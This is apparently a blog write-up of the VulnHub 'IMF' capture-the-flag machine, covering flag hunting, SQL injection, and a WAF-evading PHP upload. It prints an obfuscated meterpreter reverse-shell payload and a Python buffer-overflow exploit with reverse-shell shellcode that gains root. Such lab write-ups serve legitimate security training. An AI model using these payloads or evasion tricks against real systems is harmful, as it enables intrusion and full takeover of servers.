Write-Up: IMF: 1 – ArcSecurity>NET


okay so lets get started a vulnhub hosted CTF target..

Welcome to "IMF", my first Boot2Root virtual machine. IMF is a intelligence agency that you must hack to get all flags and ultimately root. The flags start off easy and get harder as you progress. Each flag contains a hint to the next flag. I hope you enjoy this VM and learn something.

Difficulty: Beginner/Moderate

Can contact me at: geckom at redteamr dot com or on Twitter: @g3ck0m

so step one ... find the target and give it a once over for open ports.

root@NetHunter:~# nmap -A -T5 192.168.1.14

Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-12 16:51 MST
Nmap scan report for 192.168.1.14
Host is up (0.00028s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: IMF - Homepage
MAC Address: 08:00:27:A1:F5:E7 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.2, Linux 3.16 - 4.6, Linux 3.2 - 4.6
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.1.14

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds

It looks like the only attack vector we have available at first glance is port 80.

[+] Flag #2

So poking around the web page the first flag I run across is hidden in some strangely named java-scripts utilized by the site.

<script src="js/ZmxhZzJ7YVcxbVl.js"></script>
<script src="js/XUnRhVzVwYzNS.js"></script>
<script src="js/eVlYUnZjZz09fQ==.min.js"></script>

putting all the names together, while removing all the markup gives us what looks like a base64 string

ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==
Decoding the string

root@NetHunter:~# echo "ZmxhZzJ7YVcxbVlXUnRhVzVwYzNSeVlYUnZjZz09fQ==" | base64 -d
flag2{aW1mYWRtaW5pc3RyYXRvcg==}

after the decoding of the string looks like we may have a username or password?! seems to easy...

root@NetHunter:~# echo "aW1mYWRtaW5pc3RyYXRvcg==" | base64 -d
imfadministrator

although trying some light brute forcing with different variations yields no luck, maybe lets look for flag #1...

[+] Flag #1

Okay so after some digging around, along with performing some stenographic detection work on all the images on the site detection with no luck, so back to reviewing the source code fearing I may have overlooked something and to my avail, looks like the source code of the page has some goodies!

<div class="container">
<!-- flag1{YWxsdGhlZmlsZXM=} -->
<div class="service-wrapper">
root@NetHunter:~/Downloads# echo "YWxsdGhlZmlsZXM=" | base64 -d
allthefiles

[+]Flag 3

So moving on I would be amiss if i did not give dirb a work out - yielding no great or interesting results off the quick tests; It occurs to me that this 'imfadministrator' may be a web directory...

and sure enough i am greeted with a login screen!

checking out the source to get some idea of what we are working with - and we find something intresting.

<!-- I couldn't get the SQL working, so I hard-coded the password. It's still mad secure through. - Roger -->

so looks like 'Roger' hard-coded the password; but HTF did he do that?

... so this honestly took me a bit to figure out but eventually my efforts led me to the exploitation of the PHP function (not sure which) that handled the login logic comparison of the password portion of the POST data, turns out this function was vulnerable to the forms input 'name' attributes being appended with a '[]'...

So using rogers username (taken from his email on the contact page) and then simply using firebug to append the '[]' to the name attribute of the password field and looks like we have successfully exploited the authentication mechinism! And Boom Flag 3...

flag3{Y29udGludWVUT2Ntcw==}
Welcome, rmichaels
IMF CMS
root@NetHunter:~# echo "Y29udGludWVUT2Ntcw==" | base64 -d
continueTOcms

[+]Flag 4

After visiting the cms section of the website looks like we might have hit some pay dirt in getting into the system ...

it looks like the cms.php page takes a url query and displays the page... After looking at the original query string I decide to throw a bone at it, and looks like we have some luck! seems we have a MySQL powered CMS that may be vulnerable to SQLi.

http://192.168.1.14/imfadministrator/cms.php?pagename=home
 swapped with
http://192.168.1.14/imfadministrator/cms.php?pagename=%27
Warning: mysqli_fetch_row() expects parameter 1 to be mysqli_result, boolean given in /var/www/html/imfadministrator/cms.php on line 29

So I decide to use 'sqlmap' instead of manual testing purely for saving time... and looks like we have a successful SQLi exploitation that yields some interesting information; seems we have another page in the CMS that does not have a link available...

Database: admin
Table: pages
[4 entries]
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| id | pagename             | pagedata                                                                                                                                                              |
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 1  | upload               | Under Construction.                                                                                                                                                   |
| 2  | home                 | Welcome to the IMF Administration.                                                                                                                                    |
| 3  | tutorials-incomplete | Training classrooms available. <br /><img src="./images/whiteboard.jpg"><br /> Contact us for training.                                                               |
| 4  | disavowlist          | <h1>Disavowed List</h1><img src="./images/redacted.jpg"><br /><ul><li>*********</li><li>****** ******</li><li>*******</li><li>**** ********</li></ul><br />-Secretary |
+----+----------------------+-----------------------------------------------------------------------------------------------------------------------------------------------------------------------+

[+] Flag 4

After checking out the newly found 'tutorials-incomplete' page looks like the primary

Looks like we have a QR bar code... giving it a scan with my phone - BINGO!

flag4{dXBsb2Fkcjk0Mi5waHA=}
root@NetHunter:~# echo "dXBsb2Fkcjk0Mi5waHA=" | base64 -d uploadr942.php

Looks like we have another page to check out...

[+] Flag 5

It looks like we may be getting close to the end of the game here... we have an upload form, after checking it out thoroughly I have deduced that you cant upload certain file types but i did have success uploading a GIF image... then after some more observation trying to figure this out I noticed that after a successful upload there are some artifact HTML comments in the source code. Having seen and built file uploading systems before, sometimes the developer will have the uploaded file renamed (so to not cause errors if two files have the same name) and for debugging will have the output in some way during the development process... that in mind is this a filename?!

<!-- 3261dafa822b -->
 <!-- 032b44600d91 -->
 <!-- ba4fb7f9de5c -->
 <!-- 566e3a80404d -->
 <!-- 3bf21765c311 -->
 <!-- 68fe756a5a8e -->
 <!-- d7bf444ca7a0 -->
 <!-- 1eaf5abd1259 -->
 <!-- 3f0f8fc354b6 -->
 <!-- 59c70f672c9e -->
 <!-- 6aca40a021a4 -->
 <!-- 71f3e7beb1b8 -->
 <!-- abf5e1695a51 -->
 <!-- b2bae22f7cbd -->
 <!-- 4d1896fbe035 -->

A little experimenting and looks like we got something! While looking into one of my uploaded files it seems the server actually attempts to process the content of the file!

http://192.168.56.101/imfadministrator/uploads/4d1896fbe035.gif

GIF87a�Z���̖�������������ŷ��������,�Z��I��8�ͻ�`(�di�h��l�p,�tm�x��|����pH,�Ȥr�l:�ШtJ�Z�جv��z��xL.���z�n���|N�����~������������������������������������������������������������������������������������������������������������������������������@P����QB� �#`��E_2��� c���$���@�})�x�e�| ��W��|3ԔpS�I�0~�\8�̟$]*��䁦 �,h� R�����*r%@�$Y",]*ډE� �yS���4y�}!�,�@� �5Q��SX5�����r�'S&Z�,���C���o���$m��>��2���V�W�pE�6U8����-0ط}_ƐO���*��.j����l� ܴ�)��L������{�}�'h��켞��|=���0�o>�j���3���Lsu��V��aQ`]�R�]�&�}�muRp`�]=��G�Wኑ��A����e1^��{$:�m�E'�@:ҟ?�<6t��c�ACnpW�! �AVi�j̄#�(�h�?Q�AO�[iV�YȄޑ=&iu��Aa�'��j��nj`�U��Iؠ�&]�U��V��)if�a�闛7�%Җh��p�5:�x�9A�2��Z��i��L ����0)R��j�yx\!��>��` �VP���FG�� ���!0j�����A�J�חҖk�覫������+���k��������,��l��'���7���G,��Wl��g���w��� �,��$�l��(����,����0njn;

in a spitball attempt to get a foothold in the system I try the following

GIF98

<?php
 phpinfo()
?>

And we have an attack vector! So obviously I quickly copy and paste some code from one of my php webshells but no love, seems there is a WAF and we get the following error.

Error: CrappyWAF detected malware. Signature: fopen php function detected

Doing some poking around I found that the WAF does not mind the file_put_contents() function...

GIF98

<?php
 file_put_contents("test.txt","hello there");
?>

File successfully uploaded. and looks like our file is there and waiting!!

http://192.168.56.101/imfadministrator/uploads/test.txt

And after some serious trial and error I finally got a payload past the upload page... Essentially I utilized 'msfvenom' to generate a php meterpreter payload, then using multiple methods of encoding (urlencode(), and str_rot()) I was able to get me a backdoor installed on the target.

root@NetHunter:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444

GIF98

<?php

$payload = <<<ENC
%2F%2A%3C%3Fcuc+%2F%2A%2A%2F+reebe_ercbegvat%280%29%3B+%24vc+%3D+%27192.168.56.1%27%3B+%24cbeg+%3D+4444%3B+vs+%28%28%24s+%3D+%27fgernz_fbpxrg_pyvrag%27%29+%26%26+vf_pnyynoyr%28%24s%29%29+%7B+%24f+%3D+%24s%28%22gpc%3A%2F%2F%7B%24vc%7D%3A%7B%24cbeg%7D%22%29%3B+%24f_glcr+%3D+%27fgernz%27%3B+%7D+ryfrvs+%28%28%24s+%3D+%27sfbpxbcra%27%29+%26%26+vf_pnyynoyr%28%24s%29%29+%7B+%24f+%3D+%24s%28%24vc%2C+%24cbeg%29%3B+%24f_glcr+%3D+%27fgernz%27%3B+%7D+ryfrvs+%28%28%24s+%3D+%27fbpxrg_perngr%27%29+%26%26+vf_pnyynoyr%28%24s%29%29+%7B+%24f+%3D+%24s%28NS_VARG%2C+FBPX_FGERNZ%2C+FBY_GPC%29%3B+%24erf+%3D+%40fbpxrg_pbaarpg%28%24f%2C+%24vc%2C+%24cbeg%29%3B+vs+%28%21%24erf%29+%7B+qvr%28%29%3B+%7D+%24f_glcr+%3D+%27fbpxrg%27%3B+%7D+ryfr+%7B+qvr%28%27ab+fbpxrg+shapf%27%29%3B+%7D+vs+%28%21%24f%29+%7B+qvr%28%27ab+fbpxrg%27%29%3B+%7D+fjvgpu+%28%24f_glcr%29+%7B+pnfr+%27fgernz%27%3A+%24yra+%3D+sernq%28%24f%2C+4%29%3B+oernx%3B+pnfr+%27fbpxrg%27%3A+%24yra+%3D+fbpxrg_ernq%28%24f%2C+4%29%3B+oernx%3B+%7D+vs+%28%21%24yra%29+%7B+qvr%28%29%3B+%7D+%24n+%3D+hacnpx%28%22Ayra%22%2C+%24yra%29%3B+%24yra+%3D+%24n%5B%27yra%27%5D%3B+%24o+%3D+%27%27%3B+juvyr+%28fgeyra%28%24o%29+%3C+%24yra%29+%7B+fjvgpu+%28%24f_glcr%29+%7B+pnfr+%27fgernz%27%3A+%24o+.%3D+sernq%28%24f%2C+%24yra-fgeyra%28%24o%29%29%3B+oernx%3B+pnfr+%27fbpxrg%27%3A+%24o+.%3D+fbpxrg_ernq%28%24f%2C+%24yra-fgeyra%28%24o%29%29%3B+oernx%3B+%7D+%7D+%24TYBONYF%5B%27zftfbpx%27%5D+%3D+%24f%3B+%24TYBONYF%5B%27zftfbpx_glcr%27%5D+%3D+%24f_glcr%3B+riny%28%24o%29%3B+qvr%28%29%3B%0A
ENC;

file_put_contents("backdoor.gif","GIF98 <?php" . str_rot13(urldecode($payload)) . "?>");

print_r(scandir("."));

phpinfo();
 ?>

I threw a scandir() in there just to list the files in the uploads directory as a check for success...

then after visiting the target URL to my uploaded backdoor I was greeted with a meterpreter shell!

http://192.168.56.101/imfadministrator/uploads/backdoor.gif
[*] Sending stage (33986 bytes) to 192.168.56.101
[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.101:49226) at 2017-02-13 10:44:39 -0700

msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
 Server username: www-data (33)
 meterpreter > sysinfo
 Computer    : imf
 OS          : Linux imf 4.4.0-45-generic #66-Ubuntu SMP Wed Oct 19 14:12:37 UTC 2016 x86_64
 Meterpreter : php/linux
 meterpreter >
meterpreter > cat flag5_abc123def.txt
 flag5{YWdlbnRzZXJ2aWNlcw==}

root@NetHunter:~# echo "YWdlbnRzZXJ2aWNlcw==" | base64 -d 
agentservices

[+]Flag 6

Poking around I run across an interesting executable as well as a file 'access_codes'

ls /usr/local/bin
 access_codes
 agent
 cat /usr/local/bin/access_codes
 SYN 7482,8279,9467

checking out the agent executable with ltrace and strings we may have a code to try to get into the program...

latrace agent
 /bin/sh: 102: latrace: not found
 ltrace agent
 __libc_start_main(0x80485fb, 1, 0xffe3c264, 0x8048970  ___ __  __ ___
 |_ _|  \/  | __|  Agent
 | || |\/| | _|   Reporting
 |___|_|  |_|_|    System

Agent ID :  <unfinished ...>
 setbuf(0xf77b8d60, 0)                            = <void>
 asprintf(0xffe3c198, 0x80489f0, 0x2ddd984, 0xf76200ec) = 8
 puts("  ___ __  __ ___ ")                        = 18
 puts(" |_ _|  \\/  | __|  Agent")                = 25
 puts("  | || |\\/| | _|   Reporting")            = 29
 puts(" |___|_|  |_|_|    System\n")              = 27
 printf("\nAgent ID : ")                          = 12
 fgets(
 Invalid Agent ID
 "\n", 9, 0xf77b85a0)                       = 0xffe3c19e
 strncmp("\n", "48093572", 8)                     = -1
 puts("Invalid Agent ID ")                        = 18

and it works! we now have access to the Agent Reporting System, however seems to be a false victory as there doesnt seem to be much use of it...

agent
 ___ __  __ ___
 |_ _|  \/  | __|  Agent
 | || |\/| | _|   Reporting
 |___|_|  |_|_|    System

Agent ID : 48093572
 Login Validated
 Main Menu:
 1. Extraction Points
 2. Request Extraction
 3. Submit Report
 0. Exit
 Enter selection:

After spending quite some time looking around the system and trying a few kernel exploits for privileged escalation I decide to back track a little bit... Earlier using 'netstat' I noticed one of the listening ports was not actually 'open' from my nmap initially - port 7788, Also while poking around I noticed that knockd was running, And on top of that the files found in the /usr/local/bin directory contained what looks like maybe a knocking sequence...

root@NetHunter:~# nmap -T5 --open 192.168.56.101 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-13 12:30 MST 
Nmap scan report for 192.168.56.101 Host is up (0.00082s latency). 
Not shown: 999 filtered ports Some closed ports may be reported as filtered due to --defeat-rst-ratelimit 
PORT   STATE SERVICE 
80/tcp open  http 

MAC Address: 08:00:27:A1:F5:E7 (Oracle VirtualBox virtual NIC) 
Nmap done: 1 IP address (1 host up) scanned in 2.85 seconds 

root@nethunterarch:~# knock 192.168.56.101 7482:tcp 8279:tcp 9467:tcp -v 
hitting tcp 192.168.56.101:7482 
hitting tcp 192.168.56.101:8279 
hitting tcp 192.168.56.101:9467 

root@nethunterarch:~# nmap -T5 --open -p 7788 192.168.56.101 
Starting Nmap 7.40 ( https://nmap.org ) at 2017-02-13 12:33 MST 
Nmap scan report for 192.168.56.101 Host is up (0.00020s latency). 
PORT     STATE SERVICE 
7788/tcp open  unknown 
MAC Address: 08:00:27:A1:F5:E7 (Oracle VirtualBox virtual NIC) 
Nmap done: 1 IP address (1 host up) scanned in 0.25 seconds

and looks like that was it! now connecting to the port and seems we get the output from the 'agent' program we were checking out earlier...

root@nethunterarch:~# nc 192.168.56.101 7788
 ___ __  __ ___
 |_ _|  \/  | __|  Agent
 | || |\/| | _|   Reporting
 |___|_|  |_|_|    System

Agent ID :

My first though now is maybe our victory earlier may not be false... Taking a quick peek at the running processes now that I have the agent program running on my end seems that the agent program is running as root, we may be able to exploit the agent program with a buffer overflow. so lets start tearing this down...

First I grabbed a local copy of the agent executable, then using pattern_create.rb I generated a random 2000 bit string and successfully broke the agent program

root@nethunterarch:/usr/share/webshells/php# ./agent
 ___ __  __ ___
 |_ _|  \/  | __|  Agent
 | || |\/| | _|   Reporting
 |___|_|  |_|_|    System

Agent ID : 48093572
 Login Validated
 Main Menu:
 1. Extraction Points
 2. Request Extraction
 3. Submit Report
 0. Exit
 Enter selection: 3

Enter report update: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
 Report: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
 Submitted for review.
 Segmentation fault

checking out our registers we can snag EAX and our crashpoint.

Program received signal SIGSEGV, Segmentation fault.
 0x41366641 in ?? ()
 (gdb) info registers
 eax            0x8048563    -11900
 ecx            0xfbad0087    -72548217
 edx            0xf7fa8870    -134576016
 ebx            0x0    0
 esp            0xffffd230    0xffffd230
 ebp            0x35664134    0x35664134
 esi            0x1    1
 edi            0xf7fa7000    -134582272
 eip            0x41366641    0x41366641
 eflags         0x10282    [ SF IF RF ]
 cs             0x23    35
 ss             0x2b    43
 ds             0x2b    43
 es             0x2b    43
 fs             0x0    0
 gs             0x63    99

We will need this info later ... now to find our offset

root@nethunterarch:~# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2000 -q 41366641
[*] Exact match at offset 168

So '168' is the magic number... putting it all together we can brew up with our little exploit

import socket 
# Connect to target @ 7788 and get to the point of dumping the payload. 
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
client.connect(("192.168.56.101", 7788)) 
client.recv(512) 
client.send("{0}\n".format(48093572)) 
client.recv(512) 
client.send("{0}\n".format(3)) client.recv(512) 
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4445 -b "\x00\x0a\x0d" -f python 
buf =  "" 
buf += "\xba\xf6\x10\x7e\x7b\xdb\xc2\xd9\x74\x24\xf4\x5e\x31" 
buf += "\xc9\xb1\x12\x31\x56\x15\x03\x56\x15\x83\xee\xfc\xe2" 
buf += "\x03\x21\xa5\x8c\x08\x11\x1a\x20\xa4\x94\x2c\xa0\xb1" 
buf += "\x78\x81\xad\x56\x21\x72\x6e\xf0\xee\x83\x06\x02\x0f" 
buf += "\x95\x8b\x8b\xee\xff\x55\xd3\xa0\xae\xce\x6a\xa1\x12" 
buf += "\x3c\xec\x90\x92\x07\xec\xc4\x9c\x77\x65\x07\x5d\x9c" 
buf += "\x79\x09\xbd\x6f\x31\xf4\x8f\xf0\x6a\x8e\xf1\x68\x3a" 
buf += "\x9c\x41\x89\x8f\x1d\x5e\x6f" 
# resize the buffer to the correct size 
buf += "a" * (168 - len(buf)) 
#Append EAX Register Info 
buf += "\x63\x85\x04\x08\n" 
client.send(buf)

Looks like we are in! and as root

# cd /root
 # ls
 Flag.txt  TheEnd.txt
 # cat Flag.txt
 flag6{R2gwc3RQcm90MGMwbHM=}

root@nethunterarch:~# echo "R2gwc3RQcm90MGMwbHM=" | base64 -d
 Gh0stProt0c0ls

# cat TheEnd.txt
 ____                        _ __   __
 /  _/_ _  ___  ___  ___ ___ (_) /  / /__
 _/ //  ' \/ _ \/ _ \(_-<(_-</ / _ \/ / -_)
 /___/_/_/_/ .__/\___/___/___/_/_.__/_/\__/
 __  __/_/        _
 /  |/  (_)__ ___ (_)__  ___
 / /|_/ / (_-<(_-</ / _ \/ _ \
 /_/__/_/_/___/___/_/\___/_//_/
 / __/__  ___________
 / _// _ \/ __/ __/ -_)
 /_/  \___/_/  \__/\__/

Congratulations on finishing the IMF Boot2Root CTF. I hope you enjoyed it.
 Thank you for trying this challenge and please send any feedback.

Geckom
 Twitter: @g3ck0ma
 Email: geckom@redteamr.com
 Web: http://redteamr.com

Special Thanks
 Binary Advice: OJ (@TheColonial) and Justin Stevens (@justinsteven)
 Web Advice: Menztrual (@menztrual)
 Testers: dook (@dooktwit), Menztrual (@menztrual), llid3nlq and OJ(@TheColonial)

Conclusion

I had a really good time with the CTF and picked up a few tricks in the process. probably took me around 12 hours from start to finish however broken into a few sessions across two days. all in all a really good time!